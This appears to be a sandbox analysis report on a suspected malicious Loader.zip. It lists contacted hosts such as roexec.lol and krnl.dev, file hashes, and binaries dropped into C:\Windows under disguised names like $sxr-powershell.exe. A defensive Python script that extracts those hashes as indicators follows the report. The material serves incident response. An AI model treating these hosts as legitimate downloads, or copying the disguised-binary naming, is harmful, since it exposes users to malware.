| GB | 92.123.128.181:443 | th.bing.com | tcp |
| GB | 92.123.128.181:443 | th.bing.com | tcp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 204.79.197.200:443 | www2.bing.com | tcp |
| US | 204.79.197.200:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 195.35.38.116:443 | roexec.lol | tcp |
| US | 195.35.38.116:443 | roexec.lol | tcp |
| US | 195.35.38.116:443 | roexec.lol | tcp |
| US | 195.35.38.116:443 | certified.lol | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 195.35.38.116:443 | certified.lol | tcp |
| US | 195.35.38.116:443 | certified.lol | tcp |
| US | 195.35.38.116:443 | certified.lol | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| GB | 88.221.134.130:443 | aefd.nelreports.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| GB | 88.221.134.130:443 | aefd.nelreports.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 88.221.134.130:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.134.221.88.in-addr.arpa | udp |
| GB | 92.123.128.177:443 | th.bing.com | tcp |
| US | 104.21.45.127:443 | krnl.dev | tcp |
| US | 104.21.45.127:443 | krnl.dev | tcp |
| US | 192.0.77.48:443 | s.w.org | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | tcp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5c3ea95e17becd26086dd59ba83b8e84 |
| SHA1 | 7943b2a84dcf26240afc77459ffaaf269bfef29f |
| SHA256 | a241c88bb86182b5998d9818e6e054d29b201b53f4f1a6b9b2ee8ba22dd238dc |
| SHA512 | 64c905e923298528783dc64450c96390dc5edbda51f553c04d88ee944b0c660b05392dc0c823d7fb47f604b04061390b285f982dfcc767c8168ccb00d7e94e21 |
\??\pipe\LOCAL\crashpad_5060_GIRDAMHPJMQMHZDS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c65e704fc47bc3d9d2c45a244bb74d76 |
| SHA1 | 3e7917feebea866e0909e089e0b976b4a0947a6e |
| SHA256 | 2e5d6a5eeb72575f974d5fa3cdff7ad4d87a361399ffdd4b03f93cdbdec3a110 |
| SHA512 | 36c3be0e5fbc23c5c0ad2e14cfb1cf7913bea9a5aeb83f9f6fcf5dbc52a94d8ccb370cef723b0cda82b5fba1941b6a9ff57f77ff0076a2c5cf4250711e3dd909 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6a74da537923af1006185e9befa6d9a9 |
| SHA1 | 0469d9f2e691e95d6b228b791b6510e1e8dee86e |
| SHA256 | ccef149182ba2fc272ee91d3d1485ccb2ac9a59918eb9df1de6a0607b231f110 |
| SHA512 | 01349b5c419a338f4f0bf62b3766f6e2c0c599ff78b1aa75b16d7e0fecc31def49c91454ff98cb071b9c795f7fbc71290739bf6388efffa6451e3ee46a43488b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5a6724948a6de41d8ea8e826326e4ae0 |
| SHA1 | 7233ea46fecfa0bcaf3322c0ec49a75afa16aab3 |
| SHA256 | bcebaf7ebbe34b6fe1a63ad6f1b0f41555868d0dfae54275f71bb2c091fcfb03 |
| SHA512 | 47906c91affc1f93a2534fd3cf24c805c13beee921ef15200db894c299619b8fdf691f7866eacb83ff5360b240d7bd4c233d3991b1fb5a3c03c8631482da1c1b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 63ee7d14e2e0d3397262e85785cce4b3 |
| SHA1 | ce78c13951e4518fd3b4b462e24c7d9351d36257 |
| SHA256 | da8cbbb7ba264632297ebeb57f1af32ed6c64f0ceb6bf529e912580eaffd31b2 |
| SHA512 | 0f3145566a802ae6858e5f40dad6b4eaa7d6c2886ef4a403d6c82e4fdd87c1f46fe2380155a0d7786d5bfa9cb797551854abdbc1c213d07f33891228845227d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 908e8d70878588e4657bfe595e9ae276 |
| SHA1 | e68018d68bc65e09fb3323d058a572a9098e30e3 |
| SHA256 | 6bb3c7a875d17ba91140e2e4cbf1510286f9db193fd83cdaaf19a3c7d78c0eb4 |
| SHA512 | f69cf64d11fba4e771dea198884589b4763f414de67aab514661c23281c802e1a2cfc3f0a61ffa7a555ea20b6cd50093f7ad5ea3c4715295e3dae570959e21f7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 95945f7fa812eeeaf50e51f8b4a517b2 |
| SHA1 | abb14c3216bbef89710428e8892f13a73db32dcf |
| SHA256 | 632ccdfc59c320e77f7aa8af05cd31edb22949a5d0eec4f58023546afd62dc5b |
| SHA512 | b0a173c89d9b01cb236329637c5dd4cb8b92e7999c802c54d6fa10ea71770fe0cd741ccaedb73e0475012f080f8d7798faff4fb80d325c5e85cd9c0802122ee9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | a4435041d32ec4fd5a07380234d5acdf |
| SHA1 | d2dde195cac4e554fc2e71139c4acf94376af20a |
| SHA256 | 103b6be633d6fd412a2c1d9bb8bdd491609b0976977cff3dd43e6d29e4ee9dd0 |
| SHA512 | fcabca3e1c67b9e55152a30c87acc64d31fc86ff9b1763a3ddfc67e4c3b1ac3c2e50b75e989efbc44f1e8a31a6dd7a5b9aa2468ef32d16634e4ee9eb08057fab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | f55308b11853ed71d1b58091b1e2360c |
| SHA1 | 89ffd41c65e5d56a1f7b12e0a3f37112cd02d033 |
| SHA256 | be6ab8bfb70f8e9540b53f279ca48c0407e2a13b17e050203a8575913fedbb88 |
| SHA512 | 96a8f5383ef4fc0f19be3bbf349be8275f7a65ce1e31476803eb6722428c49c43a8b86112bd3f091272510163b7b398bdc84a7db8bf7a3243810c181911e524f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | e77aed570206af2675db030ccef9daf6 |
| SHA1 | 251d11d55c69563e3d7325ac671cf86e90a75a79 |
| SHA256 | 14296e04a0d954266f07abae864d11172951e2a1e1694f3be0079520d0420eaf |
| SHA512 | 707f860c7e05ef50ca43683f0eda40944eb9cb8d531dedc4de7bef794a3ab9171740e65e4c74f22c03e21accd932cb3be223722da79bdcf2367a354189817044 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e0dfd42fd1b19b370c62589051c2425b |
| SHA1 | 993064782b0b0b4ae3da68efbe60d8f632bab80d |
| SHA256 | dc15016f85221aefb20e813b688c8038296def017a13426c938b557a7c89eb2e |
| SHA512 | 38c08d95e98dc8625e352cd33818d320d5dc1867b54baf601add2d2a8286cdcf02dd2ebcdc13934a1e6dacc4aa574702acf28fdf72266fcb0792c33ad758677d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe581e9f.TMP
| MD5 | 6ac92cf57faf0e36e5e34e82ae7ebca7 |
| SHA1 | dfa909b61c7fd7d5eba8b3974b21d988c34be058 |
| SHA256 | 0b2c41de8c96d01a8668d42fc184ecd117f2ef2fbd93168ccc1d30bf0765c982 |
| SHA512 | d9352c61917e70c2261834b5cc287d27264d72d66f328a4f8fa72b1cfbc27ffcb54ea1698a13e3259099139b9302fcca49dd230cef45d7b1ac9ca3e1318f4929 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f0e008da3f7b4e9367c2b9e33480cdba |
| SHA1 | 1b83d6d3485d026d627aa11e45db3a11aaaeec24 |
| SHA256 | cf8b7c242ce08c5ab3b973bf41ed13820f4b2b7d9b05d95277d6bd859e632921 |
| SHA512 | 28ff3bff4e3f4c7d7c47f9cb5e44f337699478b37bbff4e63427b891e049f7fb6b8251e3d6a53b01b526df0c372b30284844d6158553d843f5231431858f0bbc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
| MD5 | 7d5eacbf0dd996db1cb13d8af38ff96b |
| SHA1 | 87585612306c60dd7860c176fcbe346649eefe76 |
| SHA256 | b93db7697473491ece00785ec705b92737f0bc83de6978bfd6a0ab970cd65c7b |
| SHA512 | 3e2871f240d496125d9b6c764d33c15732b8857d7a311d00098adb791659596430b7c00942a169390dbf82c9c71121be463fa110173c51c45319466aea096f96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7f7355e5d0d28c47312df75953b2376a |
| SHA1 | 4bf95bef6559a0f62b62d24090d8862bc746f635 |
| SHA256 | 017d065d92215e9b551affcb4a64f44b15938139552f2bc033777c8c7bd16cca |
| SHA512 | ce55e1ff60c1e78d97091e4ee7386d84841b0535efcf28e4d6f3c7268d097321cd66c6a1e3876af892e2e4bbad1d309a7e2553beecacadb2e30628256b1d0c18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3ad19751f76c1f18b74c2356f76e1f76 |
| SHA1 | 31edc7f1d849b897ba7bed296ee67d1822ea0c11 |
| SHA256 | 7bd869f630812aef6bb404c35b780d851151d296fbdd1ba7dc7d9fb18d03b1f6 |
| SHA512 | af5d3f746b42fc98c3461fde8fee61b7009b20beb106be938e3815d990874607dee480db6c9072a1acdc12b9e714aa2d369c0575fe8cdd977d44901a98693399 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 1b299897a0e734d84be6f02f524f0bfe |
| SHA1 | ef16a90efa6f8435b536448ff8e000db0f941f90 |
| SHA256 | d1c3aab672be8c3accffae101c1a397de7b2b00b931a44bcaaf6e3708be16af8 |
| SHA512 | a7eadc7f8d0c2b1b60b01890f1948833adbe3680cf0a52ec323271cf917d602f78e36ca35eb09bff8d9db4c92639fd8dc453acac01bccbb3bac4ce43767e53ee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 917ed79810830d45a4acd489fa803242 |
| SHA1 | db5b90d2d9a10182da1ef74e189786ddb95a4075 |
| SHA256 | 22144f9f974da1d23c366a6d6ff28b2ce17d3691b081402a997c35a763004621 |
| SHA512 | 2f2fb40688d28c819dd4744c107f92ecf04bf0a83d13bdd583a2b8b2eef71a1d3b6f0720b2fbdf194565e7ad8fdfa7371b3196afe6e3e913cace89c143fb76af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4816fd127657ba5c363502710f55275a |
| SHA1 | 9caa15812d239d8cc3e0690e00a5c4425773a830 |
| SHA256 | ffe10dd24cfeda3e6b9500cc2fd9d7dbefe2fb27254b73a983c02f82778695eb |
| SHA512 | b421d26e4a0f8173ca4c2dc21fc5cf8f42e3783b4d3993a24fd21b9d69beb026fc536edf8bdc88bff556054ff07ce8ad077cb1141fd9b69eb5d8660c3f1c86ac |
C:\Users\Admin\Downloads\Loader.zip:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\Downloads\Loader.zip
| MD5 | 8634d93ae4d9e6a763b3fe9d140d820e |
| SHA1 | 1c95c71759a567de680b1297c8246d9bfdd2b5eb |
| SHA256 | b71bf7eef397522a3ca415fd83c0c393e328eaf5c61edf622289cfc5c2b4f6dd |
| SHA512 | 7466e9aba04c00150b0c3fef0a4523b31b744f844eaef11b153d970324cd6c23be114d4a553bf95ba035cfef74fc2319e73f5fda433a7cc178b7cc223992b5f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bcf4cfae0d56227e93e51f12f7448296 |
| SHA1 | 49759bd3bdffc3cf9eb5a4675f3c4d82a1b0b5ce |
| SHA256 | ee379c4144f792ceb30f2361e8d29bb4f9ad454dab96fdb4c0c75bbce65ef7a9 |
| SHA512 | a0acc2981907b20f6495af7f7058e1127ef8a6c063915cdd727bde7bbe85dedccaa90cd0fd2d45b4b9ada674d0d3a4da78e091e704930b0271888e6615c6c76f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | bacaec4240f226b9c4b6571caa5b55b7 |
| SHA1 | 1aae1024e393c43d8a8eaaaf90dab6a91320bb37 |
| SHA256 | b7009cd4f8215c00df2fdeb4c19f47744ac85e05299868bdd2b8a127f5630050 |
| SHA512 | 12da3da8061f9fd1e163ef4f893e64909d33bed7ba8ad237f05725a57f6c1e42948344742997497bd6b20148cfc39439dd1e29a9f2122c67016845890af6a1f8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d07ba308715e5189eb664e2fe9771f9d |
| SHA1 | 738685032a1df1a8bdcfbf6df5c9fe2a8b049ea3 |
| SHA256 | 4d6480b5aeb3ae06abbe30a6e969fadf45b267159263cda59ac9a10694852e4c |
| SHA512 | b1e36b78f674cdd17dcc2cdbf2d33db50075bde8216e62a80ae54986a8019a66c16744ccfc0f835e8e53180ac023c7f5dd5ee4d667d97f20879b8262f9088d93 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dfohk201.ujy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1472-513-0x00000266FF170000-0x00000266FF192000-memory.dmp
memory/1472-514-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1472-515-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-516-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-517-0x00000266FF5C0000-0x00000266FF606000-memory.dmp
memory/1472-522-0x0000026688000000-0x0000026688AAC000-memory.dmp
memory/1472-526-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-527-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-528-0x0000026688AD0000-0x00000266895BC000-memory.dmp
memory/1472-529-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-531-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-530-0x00007FF9BC780000-0x00007FF9BC83D000-memory.dmp
memory/1472-532-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-533-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-534-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-535-0x00007FF99A010000-0x00007FF99AAD2000-memory.dmp
memory/1472-536-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-537-0x00007FF9BE0E0000-0x00007FF9BE2E9000-memory.dmp
memory/1472-538-0x00000266899D0000-0x0000026689ACC000-memory.dmp
memory/1472-539-0x0000026689AD0000-0x0000026689AF2000-memory.dmp
memory/1472-540-0x0000026689B10000-0x0000026689B16000-memory.dmp
memory/1472-541-0x0000026689B20000-0x0000026689B7E000-memory.dmp
memory/1472-542-0x0000026689B80000-0x0000026689BD8000-memory.dmp
memory/1472-543-0x0000026689AF0000-0x0000026689AF6000-memory.dmp
memory/1472-544-0x00000266E6D20000-0x00000266E6D28000-memory.dmp
memory/1472-545-0x0000026689B00000-0x0000026689B06000-memory.dmp
memory/1472-546-0x0000026689BE0000-0x0000026689C1E000-memory.dmp
memory/1472-547-0x0000026689C20000-0x000002668A84C000-memory.dmp
memory/1472-557-0x000002668A850000-0x000002668A902000-memory.dmp
memory/1472-558-0x000002668A900000-0x000002668A936000-memory.dmp
memory/1472-559-0x000002668A940000-0x000002668A998000-memory.dmp
memory/1472-560-0x000002668A9A0000-0x000002668A9CE000-memory.dmp
memory/1472-561-0x00007FF6B6C20000-0x00007FF6B6C8E000-memory.dmp
memory/1472-563-0x00000266FEF10000-0x00000266FEF20000-memory.dmp
memory/1472-562-0x00000266FF0E0000-0x00000266FF12B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
| MD5 | d6b36c7d4b06f140f860ddc91a4c659c |
| SHA1 | ccf16571637b8d3e4c9423688c5bd06167bfb9e9 |
| SHA256 | 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92 |
| SHA512 | 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
| MD5 | 81b5bf3e7f17f01a1700eef349957808 |
| SHA1 | b9cd99e57d95da98a135b89458fbb173624d86af |
| SHA256 | dd8b51eefbecd4f6aa6d47bb282c01402fe6cbc8708db5406d8c0a7de3084052 |
| SHA512 | ce9a3dce9d883ab231b2e5643fa11ced7318c0a2e84b60711212d2d156e4e8ef27e4304ec20aa90584cc8a10949e031fe116059b0e4b48d9b69e956c059c101b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
| MD5 | a127a49f49671771565e01d883a5e4fa |
| SHA1 | 09ec098e238b34c09406628c6bee1b81472fc003 |
| SHA256 | 3f208f049ffaf4a7ed808bf0ff759ce7986c177f476b380d0076fd1f5482fca6 |
| SHA512 | 61b54222e54e7ab8743a2d6ca3c36768a7b2cf22d5689a3309dee9974b1f804533720ea9de2d3beab44853d565a94f1bc0e60b9382997abcf03945219f98d734 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e
| MD5 | 76a3f1e9a452564e0f8dce6c0ee111e8 |
| SHA1 | 11c3d925cbc1a52d53584fd8606f8f713aa59114 |
| SHA256 | 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c |
| SHA512 | a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f
| MD5 | 710d7637cc7e21b62fd3efe6aba1fd27 |
| SHA1 | 8645d6b137064c7b38e10c736724e17787db6cf3 |
| SHA256 | c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b |
| SHA512 | 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010
| MD5 | 74e33b4b54f4d1f3da06ab47c5936a13 |
| SHA1 | 6e5976d593b6ee3dca3c4dbbb90071b76e1cd85c |
| SHA256 | 535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287 |
| SHA512 | 79218e8ee50484af968480ff9b211815c97c3f3035414e685aa5d15d9b4152682d87b66202339f212bf3b463a074bf7a4431107b50303f28e2eb4b17843991c2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011
| MD5 | 24a16440d5b663d0d87263e812e3fd90 |
| SHA1 | 0ffec5a540218892b440703dfbf04bf1252def68 |
| SHA256 | c3af8b6de514fe12fef4987e8a1a9c6294ea0ebf46d0537bf02d18595abbe799 |
| SHA512 | 9845ca0adcbdf6e77a021073f5f01c6b0ecc0593d2c7e13d58b7717368d466d69f74c51934c77f21aaaf0704815fdefdf285748aa3e17441b700ba092a6df9cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ffbc3e6f6d3f7da3db00a1af12ff952c |
| SHA1 | 82a9e508ad28eaa8f0cf9c93e952cb1afbeb2798 |
| SHA256 | de023022027667257ffb9e2c80ebe514c5777a473816e7d1a96a96af96bfb341 |
| SHA512 | 3789d641dbd25a1d00f06066dcdf8770390e22dd39de48cc845bfce7838b77c3a567c1a4de9154a9904d7d28d13ea551b8f8682a090975ea909d64ead51bad03 |
memory/1472-767-0x000002668A9D0000-0x000002668A9D8000-memory.dmp
memory/1472-768-0x0000000180000000-0x0000000180007000-memory.dmp
memory/1472-826-0x00007FF9996A8000-0x00007FF9996A9000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
| SHA512 | df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd |
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
C:\Windows\$sxr-powershell.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
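The entries above are a flat path-plus-hash listing, so the three things a responder actually wants from them (the hashes of the dropped `C:\Windows\$sxr-*.exe` binaries, confirmation that the `Loader.zip:Zone.Identifier` stream flagged under "NTFS ADS" is an ordinary Mark-of-the-Web record rather than hidden payload, and recognition that the crashpad pipe entry is a zero-byte file) have to be dug out by hand. The following Python is an added example, not part of the sandbox report or of any tool the report was produced with: it parses a constructed excerpt of the listing (paths and hashes copied verbatim from the entries above; the `REPORT_EXCERPT`, `parse_files`, `classify`, `motw_zone` and `dropped_binary_iocs` names are this example's own), classifies each entry, and checks the Zone.Identifier hash against the canonical `[ZoneTransfer]` / `ZoneId=N` body that Windows writes for downloads.

```python
"""Pull IoCs out of a sandbox "Files" listing (added example, not the report's own tooling)."""
import hashlib
import re

# Constructed excerpt of the Files section above; every path and hash is copied from the report.
# memory/... lines carry no hashes in the report and are skipped by the parser.
REPORT_EXCERPT = r"""
\??\pipe\LOCAL\crashpad_5060_GIRDAMHPJMQMHZDS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6a74da537923af1006185e9befa6d9a9 |
| SHA1 | 0469d9f2e691e95d6b228b791b6510e1e8dee86e |
| SHA256 | ccef149182ba2fc272ee91d3d1485ccb2ac9a59918eb9df1de6a0607b231f110 |
C:\Users\Admin\Downloads\Loader.zip:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
C:\Users\Admin\Downloads\Loader.zip
| MD5 | 8634d93ae4d9e6a763b3fe9d140d820e |
| SHA1 | 1c95c71759a567de680b1297c8246d9bfdd2b5eb |
| SHA256 | b71bf7eef397522a3ca415fd83c0c393e328eaf5c61edf622289cfc5c2b4f6dd |
memory/1472-513-0x00000266FF170000-0x00000266FF192000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
C:\Windows\$sxr-powershell.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
"""

EMPTY_MD5 = hashlib.md5(b"").hexdigest()  # MD5 of zero bytes
# Path prefix of the dropped binaries named in the report's "Drops file in Windows directory" signature.
DROPPED_PREFIX = "c:\\windows\\$sxr-"
# Drive-letter path whose final component contains a colon: an NTFS alternate data stream.
ADS_RE = re.compile(r"^[A-Za-z]:\\.*:[^\\]+$")


def parse_files(text):
    """Turn 'path line followed by | MD5 | ... | rows' into a list of dicts with lowercase hashes."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("|"):
            cells = [c.strip() for c in line.strip("|").split("|")]
            if current is not None and len(cells) == 2:
                current[cells[0].lower()] = cells[1].lower()
        elif line.startswith("memory/"):
            current = None  # memory dump: no hash rows follow
        else:
            current = {"path": line}
            entries.append(current)
    return entries


def motw_zone(md5_hex):
    """Return the ZoneId whose canonical Zone.Identifier body hashes to md5_hex, or None.

    Windows writes the stream as an INI fragment '[ZoneTransfer]' / 'ZoneId=N'; both CRLF and LF
    line endings are tried so the check does not depend on which one the writer used.
    """
    for zone in range(5):  # 0 Local machine .. 4 Restricted; 3 is the Internet zone
        for eol in ("\r\n", "\n"):
            body = f"[ZoneTransfer]{eol}ZoneId={zone}{eol}".encode()
            if hashlib.md5(body).hexdigest() == md5_hex.lower():
                return zone
    return None


def classify(entry):
    """Bucket an entry: empty file, ADS, dropped binary, browser noise, or other."""
    path, md5 = entry["path"], entry.get("md5", "")
    if md5 == EMPTY_MD5:
        return "empty"
    if ADS_RE.match(path):
        return "ads"
    if path.lower().startswith(DROPPED_PREFIX):
        return "dropped_binary"
    if "\\microsoft\\edge\\user data\\" in path.lower():
        return "browser_artifact"
    return "other"


def dropped_binary_iocs(entries):
    """SHA256 values worth blocking/hunting: only the binaries dropped into C:\\Windows."""
    return sorted(e["sha256"] for e in entries if classify(e) == "dropped_binary")


if __name__ == "__main__":
    parsed = parse_files(REPORT_EXCERPT)
    for e in parsed:
        kind = classify(e)
        extra = f" (ZoneId={motw_zone(e['md5'])})" if kind == "ads" else ""
        print(f"{kind:16} {e['path']}{extra}")
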